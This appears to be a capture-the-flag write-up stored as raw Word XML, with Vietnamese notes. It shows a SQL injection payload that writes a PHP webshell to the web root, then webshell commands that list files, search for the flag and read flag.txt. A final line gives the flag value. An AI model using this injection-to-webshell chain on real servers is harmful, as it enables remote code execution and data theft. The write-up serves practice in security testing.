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B9214" w14:textId="77777777" w:rsidR="00EA0730" w:rsidRDefault="00EA0730"/>
    <w:p w14:paraId="4FA86964" w14:textId="5AE9F9CE" w:rsidR="00E049B7" w:rsidRDefault="00E049B7">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E049B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="D8DDE9"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E049B7">
        <w:t>  Find the flag by using a webshell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B269CDF" w14:textId="23034630" w:rsidR="00EA1C44" w:rsidRDefault="00EA1C44">
      <w:r>
        <w:t xml:space="preserve">Sử dụng câu lệnh sql tạo file Shell.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4437A" w14:textId="1BF18276" w:rsidR="002A41B3" w:rsidRDefault="005C07F0">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBCF77A" w14:textId="2249F851" w:rsidR="005C07F0" w:rsidRDefault="005C07F0">
      <w:r w:rsidRPr="005C07F0">
        <w:t>khanh' UNION SELECT NULL, '&lt;?php system($_GET["cmd"])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C07F0">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C07F0">
        <w:t>&gt;', NULL, NULL INTO OUTFILE '/var/www/html/Shell.php'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35190F17" w14:textId="585FAC7E" w:rsidR="005C07F0" w:rsidRDefault="005C07F0">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FED0222" w14:textId="79E0C8B2" w:rsidR="00282F77" w:rsidRDefault="00282F77">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F8051A5" wp14:editId="77296B48">
            <wp:extent cx="5943600" cy="1424940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1201985670" name="Picture 1" descr="A blue rectangular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5670" name="Picture 1" descr="A blue rectangular box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F6EB" w14:textId="591335DC" w:rsidR="00EE56C1" w:rsidRDefault="00EE56C1">
      <w:r>
        <w:t xml:space="preserve">Truy cập đường dẫn chứa shell được tải lên và thực thi câu lệnh xem thư mục </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EEDACF" w14:textId="5FE938E1" w:rsidR="00282F77" w:rsidRDefault="00282F77">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE80286" w14:textId="538CD86B" w:rsidR="00282F77" w:rsidRDefault="00282F77">
      <w:r>
        <w:t xml:space="preserve">{url}/Shell.php?cmd=ls -la </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3429171C" w14:textId="76D3F6BF" w:rsidR="007128E9" w:rsidRDefault="007128E9">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA5806" w14:textId="31E08AAB" w:rsidR="00282F77" w:rsidRDefault="00282F77">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E348BA1" wp14:editId="76B80637">
            <wp:extent cx="5943600" cy="650875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="211363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2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8D4E" w14:textId="79E85583" w:rsidR="00F025E0" w:rsidRDefault="00F025E0">
      <w:r>
        <w:t xml:space="preserve">Tìm kiếm các file có ký tự flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC41A3F" w14:textId="0E6198B8" w:rsidR="007128E9" w:rsidRDefault="00F025E0">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1436514B" w14:textId="5D61DCD4" w:rsidR="00F025E0" w:rsidRDefault="00F025E0">
      <w:r>
        <w:t>{url}/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F025E0">
        <w:t>Shell.php?cmd=find / -name flag*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E35E1" w14:textId="093EE6EA" w:rsidR="007128E9" w:rsidRDefault="007128E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2D5960" wp14:editId="29EC6D32">
            <wp:extent cx="5943600" cy="565785"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="153081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10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8D9" w14:textId="11DAA0F9" w:rsidR="00EF43FD" w:rsidRDefault="00EF43FD">
      <w:r>
        <w:t xml:space="preserve">Đọc flag.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D77686" w14:textId="2200AB29" w:rsidR="00EF43FD" w:rsidRDefault="00EF43FD">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738F5CB4" w14:textId="350A7DB4" w:rsidR="00EF43FD" w:rsidRDefault="00EF43FD">
      <w:r>
        <w:t>{url}/</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF43FD">
        <w:t>Shell.php?cmd=cat /var/www/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F883725" w14:textId="4E1B6F8C" w:rsidR="00EF43FD" w:rsidRDefault="00EF43FD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C386B" w14:textId="7C765443" w:rsidR="00EF43FD" w:rsidRDefault="00EF43FD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="628B967C" wp14:editId="2EC020FE">
            <wp:extent cx="5943600" cy="909320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="4858750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50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6625" w14:textId="57C2E680" w:rsidR="00B53306" w:rsidRDefault="00B53306">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B53306">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B53306">
        <w:t>d2b5b27ae688b6a0f1d21b7d3a0798cd</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B5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B3"/>
    <w:rsid w:val="00282F77"/>
    <w:rsid w:val="002A41B3"/>
    <w:rsid w:val="005C07F0"/>
    <w:rsid w:val="005D12B6"/>
    <w:rsid w:val="007128E9"/>
    <w:rsid w:val="00B53306"/>
    <w:rsid w:val="00E049B7"/>
    <w:rsid w:val="00EA0730"/>
    <w:rsid w:val="00EA1C44"/>
    <w:rsid w:val="00EE56C1"/>
    <w:rsid w:val="00EF43FD"/>
    <w:rsid w:val="00F0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3BCD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{76BACB89-68B6-427B-A61C-FE3211BE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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-26T08:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-26T08:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>